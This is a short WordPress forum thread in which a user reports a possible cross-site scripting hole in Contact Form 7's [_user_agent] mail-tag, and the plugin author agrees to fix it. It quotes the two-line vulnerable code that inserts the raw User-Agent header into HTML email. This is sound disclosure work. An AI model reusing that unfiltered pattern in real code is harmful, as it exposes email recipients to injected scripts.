WordPress.org

Ready to get started?Download WordPress

Forums

Contact Form 7
[resolved] Possible XSS in [_user_agent] mail-tag (2 posts)

  1. Ov3rfly
    Member
    Posted 1 year ago #

    When looking at the code of v3.3 special-mail-tags.php because of another issue, I saw a possible XSS injection in the new [_user_agent] mail-tag.

    elseif ( '_user_agent' == $name )
    	$output = substr( $_SERVER['HTTP_USER_AGENT'], 0, 254 );

    If emails are sent as HTML (default Contact Form 7 setting is plain-text though) and the mail-tag is used, the shortened but unfiltered user agent ends up within the html of the email and can add remote scripts or other content.

    More details and background-information about this attack-vector here:
    http://www.irongeek.com/i.php?page=security/xss-sql-and-command-inject-vectors

    http://wordpress.org/extend/plugins/contact-form-7/

  2. Takayuki Miyoshi
    Member
    Plugin Author

    Posted 1 year ago #

    You're right. I'll fix it. Thank you.

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic

Tags

No tags yet.